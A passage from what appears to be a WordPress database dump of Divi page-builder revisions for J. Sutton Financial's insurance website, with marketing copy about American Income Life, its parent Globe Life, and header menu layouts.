custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 21:46:31','2023-04-08 21:46:31','',26,'http://cmdev-site1.com/?p=885',0,'revision','',0),(886,1,'2023-04-08 21:47:26','2023-04-08 21:47:26','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||||false|false\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" width_phone=\"50%\" sticky_enabled=\"0\" width_tablet=\"50%\" width=\"70%\" module_alignment=\"right\" custom_padding=\"20px|||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 21:47:26','2023-04-08 21:47:26','',26,'http://cmdev-site1.com/?p=886',0,'revision','',0),(890,1,'2023-04-08 21:56:30','2023-04-08 21:56:30','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" logo_width_last_edited=\"on|tablet\" sticky_enabled=\"0\" logo_width_phone=\"75%\" logo_width_tablet=\"75%\" menu_font_last_edited=\"on|phone\" menu_text_color_last_edited=\"on|phone\" menu_text_color_tablet=\"#000000\" menu_text_color_phone=\"#000000\" background_layout_last_edited=\"on|tablet\" background_layout_phone=\"light\" background_layout_tablet=\"light\" mobile_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:56:30','2023-04-08 21:56:30','',528,'http://cmdev-site1.com/?p=890',0,'revision','',0),(891,1,'2023-04-08 21:58:39','2023-04-08 21:58:39','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:58:39','2023-04-08 21:58:39','',528,'http://cmdev-site1.com/?p=891',0,'revision','',0),(893,1,'2023-04-08 21:59:37','2023-04-08 21:59:37','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\" menu_icon_color=\"#FFFFFF\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:59:37','2023-04-08 21:59:37','',528,'http://cmdev-site1.com/?p=893',0,'revision','',0),(894,1,'2023-04-08 22:00:39','2023-04-08 22:00:39','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" menu_icon_color=\"#FFFFFF\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" custom_padding_tablet=\"33px|1px||||\" custom_padding_phone=\"0px|0px|||false|false\" custom_padding_last_edited=\"on|phone\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" 